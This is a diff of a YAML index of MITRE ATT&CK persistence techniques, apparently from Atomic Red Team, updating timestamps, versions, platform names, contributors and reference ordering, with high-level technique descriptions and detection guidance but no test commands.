       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -33089,11 +33500,12 @@ persistence:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -33122,24 +33534,26 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -33174,9 +33588,6 @@ persistence:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1505.004:
     technique:
@@ -33236,7 +33647,7 @@ persistence:
         description: Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor
           on Targets in the Middle East. Retrieved July 6, 2018.
         source_name: Unit 42 RGDoor Jan 2018
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T15:06:24.161Z'
       name: IIS Components
       description: |-
         Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: <code>Get{Extension/Filter}Version</code>, <code>Http{Extension/Filter}Proc</code>, and (optionally) <code>Terminate{Extension/Filter}</code>. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)
@@ -33261,13 +33672,11 @@ persistence:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1505.004
     atomic_tests: []
   T1546:
     technique:
-      modified: '2024-03-01T15:49:15.588Z'
+      modified: '2024-10-15T15:57:00.731Z'
       name: Event Triggered Execution
       description: "Adversaries may establish persistence and/or elevate privileges
         using system mechanisms that trigger execution based on specific events. Various
@@ -33320,8 +33729,8 @@ persistence:
       - Windows
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'WMI: WMI Creation'
@@ -33369,78 +33778,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546
     atomic_tests: []
   T1546.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Robert Wilson
-      - Tony Lambert, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
-      type: attack-pattern
-      created: '2020-01-24T14:13:45.936Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1546.004
-        url: https://attack.mitre.org/techniques/T1546/004
-      - source_name: intezer-kaiji-malware
-        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
-        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
-          turning to Golang. Retrieved December 17, 2020.'
-      - source_name: bencane blog bashrc
-        url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
-        description: Benjamin Cane. (2013, September 16). Understanding a little more
-          about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
-      - source_name: anomali-rocke-tactics
-        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
-        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
-          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
-          December 17, 2020.
-      - source_name: Linux manual bash invocation
-        url: https://wiki.archlinux.org/index.php/Bash#Invocation
-        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
-      - source_name: Tsunami
-        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
-        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
-          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
-      - source_name: anomali-linux-rabbit
-        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
-        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
-          Malware Out of a Hat. Retrieved December 17, 2020.
-      - source_name: Magento
-        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
-        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
-          Vector. Retrieved December 17, 2020.
-      - source_name: ScriptingOSX zsh
-        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
-        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
-          Files. Retrieved February 25, 2021.'
-      - source_name: PersistentJXA_leopitt
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
-          for macOS. Retrieved January 11, 2021.
-      - source_name: code_persistence_zsh
-        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
-        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
-          Retrieved January 11, 2021.
-      - source_name: macOS MS office sandbox escape
-        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
-        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
-          Retrieved August 20, 2021.
-      - source_name: ESF_filemonitor
-        url: https://objective-see.com/blog/blog_0x48.html
-        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
-          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-25T15:02:24.143Z'
       name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
       description: "Adversaries may establish persistence through executing malicious
         commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -33488,6 +33830,10 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Robert Wilson
+      - Tony Lambert, Red Canary
+      x_mitre_deprecated: false
       x_mitre_detection: "While users may customize their shell profile files, there
         are only certain types of commands that typically appear in these files. Monitor
         for abnormal commands such as execution of unknown programs, opening network
@@ -33498,9 +33844,13 @@ persistence:
         events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
         most Linux and macOS systems, a list of file paths for valid shell options
         available on a system are located in the <code>/etc/shells</code> file.\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
       x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -33509,8 +33859,67 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+      created: '2020-01-24T14:13:45.936Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/004
+        external_id: T1546.004
+      - source_name: anomali-linux-rabbit
+        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+          Malware Out of a Hat. Retrieved December 17, 2020.
+        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+      - source_name: anomali-rocke-tactics
+        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+          December 17, 2020.
+        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+      - source_name: Linux manual bash invocation
+        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+        url: https://wiki.archlinux.org/index.php/Bash#Invocation
+      - source_name: ScriptingOSX zsh
+        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+          Files. Retrieved February 25, 2021.'
+        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+      - source_name: bencane blog bashrc
+        description: Benjamin Cane. (2013, September 16). Understanding a little more
+          about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+        url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+      - source_name: macOS MS office sandbox escape
+        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+          Retrieved August 20, 2021.
+        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+      - source_name: Magento
+        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+          Vector. Retrieved December 17, 2020.
+        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+      - source_name: Tsunami
+        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+      - source_name: PersistentJXA_leopitt
+        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+          for macOS. Retrieved January 11, 2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: code_persistence_zsh
+        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+          Retrieved January 11, 2021.
+        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+      - source_name: ESF_filemonitor
+        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+        url: https://objective-see.com/blog/blog_0x48.html
+      - source_name: intezer-kaiji-malware
+        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+          turning to Golang. Retrieved December 17, 2020.'
+        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.004
     atomic_tests: []
   T1547.002:
@@ -33547,7 +33956,7 @@ persistence:
         Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
 
         Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=&lt;target binary&gt;</code>. The binary will then be executed by the system when the authentication packages are loaded.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:29:36.291Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Authentication Package
       x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -33570,12 +33979,11 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.002
     atomic_tests: []
   T1546.015:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:34:29.402Z'
       name: 'Event Triggered Execution: Component Object Model Hijacking'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by hijacked references to Component Object Model (COM) objects.
@@ -33653,41 +34061,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.015
     atomic_tests: []
   T1137.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
-      type: attack-pattern
-      created: '2019-11-07T20:09:56.536Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.004
-        url: https://attack.mitre.org/techniques/T1137/004
-      - source_name: SensePost Outlook Home Page
-        url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
-        description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
-          Ruler Vector. Retrieved February 4, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
-      - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
-        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
-          provides blue teams with the ability to detect Ruler usage against Exchange.
-          Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:02:13.742Z'
       name: 'Office Application Startup: Outlook Home Page'
       description: |
         Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
@@ -33696,27 +34074,54 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
+      created: '2019-11-07T20:09:56.536Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/004
+        external_id: T1137.004
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SensePost NotRuler
+        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+          provides blue teams with the ability to detect Ruler usage against Exchange.
+          Retrieved February 4, 2019.
+        url: https://github.com/sensepost/notruler
+      - source_name: SensePost Outlook Home Page
+        description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
+          Ruler Vector. Retrieved February 4, 2019.
+        url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.004
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -33777,7 +34182,6 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests: []
   T1037.005:
@@ -33821,7 +34225,7 @@ persistence:
         mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
         StartupItems run during the bootup phase of macOS, they will run as the elevated
         root user."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:43:21.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Startup Items'
       x_mitre_detection: |-
@@ -33843,7 +34247,6 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.005
     atomic_tests: []
   T1078.002:
@@ -33924,7 +34327,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.003:
     technique:
@@ -33947,7 +34349,7 @@ persistence:
         description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
           Active Directory Users and Computers in Windows Server 2008. Retrieved November
           15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:25.625Z'
       name: Network Logon Script
       description: "Adversaries may use network logon scripts automatically executed
         at logon initialization to establish persistence. Network logon scripts can
@@ -33977,12 +34379,10 @@ persistence:
       - 'File: File Modification'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1197:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:21:40.927Z'
       name: BITS Jobs
       description: |-
         Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -34072,12 +34472,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1197
     atomic_tests: []
   T1546.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:45.568Z'
       name: 'Event Triggered Execution: AppInit DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -34162,7 +34561,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.010
     atomic_tests: []
   T1546.002:
@@ -34227,18 +34625,17 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.002
     atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -34271,10 +34668,9 @@ persistence:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -34311,7 +34707,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.001:
     technique:
@@ -34385,7 +34780,7 @@ persistence:
         benign software. Launch Agents are created with user level privileges and
         execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
         OceanLotus for OS X) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-21T16:13:00.598Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Create or Modify System Process: Launch Agent'
       x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -34413,12 +34808,11 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.001
     atomic_tests: []
   T1505:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T21:18:29.349Z'
       name: Server Software Component
       description: 'Adversaries may abuse legitimate extensible development features
         of servers to establish persistent access to systems. Enterprise server applications
@@ -34477,33 +34871,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
-      type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -34524,6 +34895,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -34538,52 +34910,42 @@ persistence:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1556.005:
-    technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
       type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
